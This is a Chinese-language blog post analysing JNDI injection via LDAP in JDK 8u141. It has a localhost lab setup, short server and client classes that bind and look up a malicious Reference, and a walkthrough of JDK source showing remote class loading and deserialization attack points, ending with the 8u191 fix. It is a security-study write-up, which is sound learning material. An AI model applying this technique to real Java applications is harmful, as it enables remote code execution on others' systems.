JNDI注入-ldap绕过

已于 2024-07-30 19:15:59 修改
阅读量384 收藏 3
点赞数 4
分类专栏: JNDI注入 文章标签: JNDI LDAP java
于 2024-07-30 14:37:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140796385
版权

参考博客:

JNDI注入与动态类加载

分析版本

jdk8u141

攻击实现

下载一个Apache Directory Studio,建一个JNDI服务器

image-20240728163748182

连接JNDI服务器

image-20240728180529910

认证填默认的

Bind password填secret

image-20240728180400288

连接之后

image-20240728180613925

JNDILDAPServer.java

根据LDAP服务器信息,把引用绑到LDAP服务器上。

public class JNDILDAPServer {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        Reference refObj = new Reference("Test", "Test", "http://localhost:4444/");
        initialContext.rebind("ldap://localhost:10389/cn=Test,dc=example,dc=com", refObj);
    }
}

image-20240728181803643

JNDILDAPClient.java

之后通过客户端lookup(注意把简易http服务器开起来)

public class JNDILDAPClient {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        initialContext.lookup("ldap://localhost:10389/cn=Test,dc=example,dc=com");
    }
}

image-20240729162550331

分析过程

之前在JNDI+RMI中也讲过了,getURLOrDefaultInitCtx(name)方法主要是根据我们写的name(ldap://localhost:10389/cn=Test,dc=example,dc=com),去判断jndi里面装了什么容器。这里我们就查到了ldapURLContext

public Object lookup(String name) throws NamingException {
    return getURLOrDefaultInitCtx(name).lookup(name);
}

接下来直接跟到LdapCtx#c_lookup(),里面调用了decodeObject方法。传入var4参数,var4在下图中可以看到是在LDAP中查到的一些属性。

image-20240729165337747

跟进Obj#decodeObject(),我们知道JNDI里面可以装很多类型。下面if语句就是判断,拿到的是什么类型,选择相应的方法去decode。

下面具体分析下这几个if

static Object decodeObject(Attributes var0) throws NamingException {
    String[] var2 = getCodebases(var0.get(JAVA_ATTRIBUTES[4]));

    try {
        Attribute var1;
        if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
            ClassLoader var3 = helper.getURLClassLoader(var2);
            return deserializeObject((byte[])((byte[])var1.get()), var3);
        } else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
            return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(), (String)var1.get(), var2);
        } else {
            var1 = var0.get(JAVA_ATTRIBUTES[0]);
            return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) && !var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
        }
    } catch (IOException var5) {
        NamingException var4 = new NamingException();
        var4.setRootCause(var5);
        throw var4;
    }
}

image-20240729170646012

1 ClassLoader var3 = helper.getURLClassLoader(var2); 调用到

//com.sun.jndi.ldap.VersionHelper12
private static final String TRUST_URL_CODEBASE_PROPERTY = "com.sun.jndi.ldap.object.trustURLCodebase";
private static final String trustURLCodebase = (String)AccessController.doPrivileged(new PrivilegedAction<String>() {
    public String run() {
        return System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase", "false");
    }
});

VersionHelper12() {
}
ClassLoader getURLClassLoader(String[] var1) throws MalformedURLException {
    ClassLoader var2 = this.getContextClassLoader();
    return (ClassLoader)(var1 != null && "true".equalsIgnoreCase(trustURLCodebase) ? URLClassLoader.newInstance(getUrlArray(var1), var2) : var2);
}

我jdk版本是8u141,可以看到这里也是做了trustURLCodebase的系统限制,不能远程加载类。

所以返回AppClassLoader。

之后return deserializeObject((byte[])((byte[])var1.get()), var3);,第二个参数传入AppClassLoader

private static Object deserializeObject(byte[] var0, ClassLoader var1) throws NamingException {
    try {
        ByteArrayInputStream var2 = new ByteArrayInputStream(var0);

        try {
            Object var20 = var1 == null ? new ObjectInputStream(var2) : new Obj.LoaderInputStream(var2, var1); 
            Throwable var21 = null;

            Object var5;
            try {
                var5 = ((ObjectInputStream)var20).readObject();//原生反序列化
            } catch (Throwable var16) {
//....

原生反序列化也是可以利用的
2 decodeReference(var0, var2);

这里面调用到了1中的两个方法,也是有原生反序列化攻击点的。

decodeReference(),会把引用解出来。就是下面的var3(此时已经回到LdapCtx)

image-20240729171231346

继续向下执行到return DirectoryManager.getObjectInstance(var3, var1, this, this.envprops, (Attributes)var4);

注意这里又跳到DirectoryManager里面去了,和RMI一样攻击点是不在JNDI的文件中的。

后面和RMI的分析很像。

public static Object
    getObjectInstance(Object refInfo, Name name, Context nameCtx,
                      Hashtable<?,?> environment, Attributes attrs)
    throws Exception {

        ObjectFactory factory;

        ObjectFactoryBuilder builder = getObjectFactoryBuilder();
        if (builder != null) {
            // builder must return non-null factory
            factory = builder.createObjectFactory(refInfo, environment);
            if (factory instanceof DirObjectFactory) {
                return ((DirObjectFactory)factory).getObjectInstance(
                    refInfo, name, nameCtx, environment, attrs);
            } else {
                return factory.getObjectInstance(refInfo, name, nameCtx,
                    environment);
            }
        }

        // use reference if possible
        Reference ref = null;
        if (refInfo instanceof Reference) {
            ref = (Reference) refInfo;
        } else if (refInfo instanceof Referenceable) {
            ref = ((Referenceable)(refInfo)).getReference();
        }

        Object answer;

        if (ref != null) {
            String f = ref.getFactoryClassName();
            if (f != null) {
                // if reference identifies a factory, use exclusively

                factory = getObjectFactoryFromReference(ref, f);                 //程序进入这个判断,运行到这儿
                if (factory instanceof DirObjectFactory) {
                    return ((DirObjectFactory)factory).getObjectInstance(
                        ref, name, nameCtx, environment, attrs);
                } else if (factory != null) {
                    return factory.getObjectInstance(ref, name, nameCtx,
                                                     environment);
                }
                // No factory found, so return original refInfo.
                // Will reach this point if factory class is not in
                // class path and reference does not contain a URL for it
                return refInfo;

            } else {
                // if reference has no factory, check for addresses
                // containing URLs
                // ignore name & attrs params; not used in URL factory

                answer = processURLAddrs(ref, name, nameCtx, environment);
                if (answer != null) {
                    return answer;
                }
            }
        }

        // try using any specified factories
        answer = createObjectFromFactories(refInfo, name, nameCtx,
                                           environment, attrs);
        return (answer != null) ? answer : refInfo;
}

接下来执行的factory = getObjectFactoryFromReference(ref, f);和之前RMI的流程是一样的。

再回顾一下

首先调用AppClassLoader查找本地的类,查找不到。

再去codeBase路径下面查找,查找到类,进行初始化。

我弹计算器代码是写在静态代码块儿中的所以在初始化的时候就弹了计算器

image-20240729172951886

写在构造函数中的会在下面实例化的时候弹计算器。

return (clas != null) ? (ObjectFactory) clas.newInstance() : null;

LDAP的修复

在JDK8u191中进行了LDAP漏洞的修复

在动态加载factory时,用到的com.sun.naming.internal.VersionHelper12中也加入了一个信任codeBase判断。

//VersionHelper12#loadClass()
public Class<?> loadClass(String className, String codebase)
        throws ClassNotFoundException, MalformedURLException {
    if ("true".equalsIgnoreCase(trustURLCodebase)) {    //也加入了一个信任codeBase判断
        ClassLoader parent = getContextClassLoader();
        ClassLoader cl =
                URLClassLoader.newInstance(getUrlArray(codebase), parent);

        return loadClass(className, cl);
    } else {
        return null;
    }
}
y06_z
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(之)JNDI注入绕过高版本限制
Vicl1fe的博客
12-30 955
前言 JNDI注入绕过高版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
Java代码审计】JNDI+RMI绕过高版本JDK的限制
最新发布
大河之犬的博客
03-08 969
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
JNDI访问LDAP
03-29
NULL 博文链接:https://zzqrj.iteye.com/blog/1279219
JNDI & LDAP
观千剑而后识器,操千曲而后晓声。
11-28 2048
JNDIJava Naming and Directory Interface,Java命名和目录接口)是为了Java程序访问命名服务和目录服务而提供的统一API。         命名服务,说白了就是提供一个名称键值对的管理,即Key-Value对,Key代表一个资源的名称,Value代表资源的真实地址,命名服务允许大家通过唯一的名称找到对应的对象或资源。这样程序只需要知道某种资源的名称
J2EE总结:Java命名与目录接口JNDI
萧逸闲侃
01-02 1772
JNDI 是什么 JNDIJava 命名与目录接口(Java Naming and Directory Interface),在J2EE规范中是重要的规范之一,不少专家认为,没有透彻理解JNDI的意义和作用,就没有真正掌握J2EE特别是EJB的知识。 那么,JNDI到底起什么作用? 要了解JNDI的作用,我们可以从“如果不用JNDI我们怎样做?用了JNDI后我们又将怎样做?”
JNDILDAP
diansuo8105的博客
03-23 332
对于众多接口服务、协议、互联网名称,总会遇到感到熟悉,但是时间一长就会忘记,所以还是要自己整理一下,加强记忆,当然最好的方式还是动手实践。 JNDI : 全称:JAVA NAMING AND Directory interface 解释:java 命名目录访问接口:java命名服务和目录服务而提供的统一API。 理解:通过命名来访问需要的资源,类似DNS服务,可通过 key-...
JNDILDAP
cjのice_bear
04-10 1334
读使用JNDI访问Domino目录之后 创建一个JNDI可用连接的过程 创建一个HashTable,存入LDAP工厂类(Context.INITIAL_CONTEXT_FACTORY)、服务器地址(Context.PROVIDER_URL)、(如果需要验证的话)验证方式(Context.SECURITY_AUTHENTICATION)、用户账号(Context.SECURITY_PRINCEPAL
绕过高版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1733
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 982
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
Java反序列化(之)JNDI注入
Vicl1fe的博客
12-29 1059
前言 为了学fastjson也是煞费苦心,害。感觉参考中文章讲的很容易去理解,文章大部分都参考它的。 JNDI Java命名和目录接口(JNDI)是一种Java API,类似于一个索引中心,它允许客户端通过name发现和查找数据和对象。 代码格式如下 String jndiName= ...;//指定需要查找name名称 Context context = new InitialContext();//初始化默认环境 DataSource ds = (DataSourse)context.lookup(jn
基于JavaJNDILDAP Demo
05-24
基于Java JNDI 操纵LDAP的基础实现,包括LDAP连接相关生命周期,认证的两种策略demo,条目的操作,schema的基础操作包括(attributeDefinition\objectDefinition\)但未包含相关syntaxDefinition的操纵. 没有资源分的朋友可给我发邮件ybygjy#gmail.com
LDAP认证用户名密码(JNDI)
11-28
亲测可以使用的,LDAP认证用户名密码,使用JNDI方式认证
JNDILDAP(1)
懒散狂徒的专栏
07-31 2281
 6.1  什么是JNDI在一个企业中,命名服务为读者的应用程序在网络上定位对象提供了一种方法。一个命名服务将对象和名称联系在了一起,并且可以通过它们指定的名称找到相应的对象。JNDIJava命名和目录接口,是一个为Java应用程序提供命名服务的应用程序编程接口(API)。它为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口,类似于JDBC都是构建在抽象层上。要使用JND
LdapJNDI
niu870781892的专栏
06-07 3298
Ldap基础知识 应用服务器网络协议网络应用数据结构企业应用  什么是JNDI 在一个企业中,命名服务为读者的应用程序在网络上定位对象提供了一种方法。一个命名服务将对象和名称联系在了一起,并且可以通过它们指定的名称找到相应的对象。 JNDIJava命名和目录接口,是一个为Java应用程序提供命名服务的应用程序编程接口(API)。它为开发人员提供了查找和访问各种命名和目录服务的
JNDILDAP学习笔记
iteye_15148的博客
04-06 170
JNDIJava Naming and Directory Interface,Java命名和目录接口)是为了Java程序访问命名服务和目录服务而提供的统一API。 命名服务,说白了就是提供一个名称键值对的管理,即Key-Value对,Key代表一个资源的名称,Value代表资源的真实地址,命名服务允许大家通过唯一的名称找到对应的对象或资源。这样程序只需要知...
JNDI 连接LDAP
wangguorui89的专栏
12-22 613
WINDOWS下搭建LDAP服务器 | RFC 855----Telnet选项说明书 2009 -07-07JNDI 连接Windows Active Directory 教程http://www.matrix.org.cn/resource/article/2007-03-05/JNDI+AD_ea943628-cab3-11db-b4f4-dd5a5e123c5c.html http://ww...
连接ldap_JNDI之初探 LDAP
weixin_42122306的博客
01-13 8851
这是酒仙桥六号部队的第27篇文章。全文共计2890个字,预计阅读时长10分钟。基础知识在进入JNDILDAP学习前,先了解下其中涉及的相关知识。1JAVA模型序列化对象JNDI ReferencesJNDI References是类javax.naming.Reference的Java对象。它由有关所引用对象的类信息和地址的有序列表组成。Reference还包含有助于创建引用所...
jndi可以调用LDAP RMI
07-25
是的,JNDIJava Naming and Directory Interface)可以用于调用LDAP(Lightweight Directory Access Protocol)和RMI(Remote Method Invocation)。 1. JNDILDAP: - JNDI提供了一种标准的Java API,用于通过命名和目录服务访问和操作各种命名和目录服务,包括LDAP。 - JNDI允许开发者通过统一的方式连接和操作LDAP服务器,执行搜索、读取、写入和修改等操作。 - 通过JNDI,可以使用LDAP协议与LDAP服务器进行通信,查询和管理存储在LDAP目录中的数据。 2. JNDI和RMI: - JNDI也可以用于查找和访问远程对象,包括使用RMI进行远程方法调用。 - RMI使用JNDI的命名服务来查找远程对象的引用,从而实现客户端与远程对象之间的通信。 - 通过JNDI,可以在分布式系统中定位和获取RMI服务的引用,从而实现远程方法调用。 总结而言,JNDI是一个用于访问和操作各种命名和目录服务的Java API,包括LDAP和RMI。通过JNDI,可以与LDAP服务器进行通信并操作存储在LDAP目录中的数据,也可以定位和获取远程对象的引用,实现RMI的远程方法调用。 希望以上信息对你有所帮助!如果你还有其他关于JNDILDAP或RMI的问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值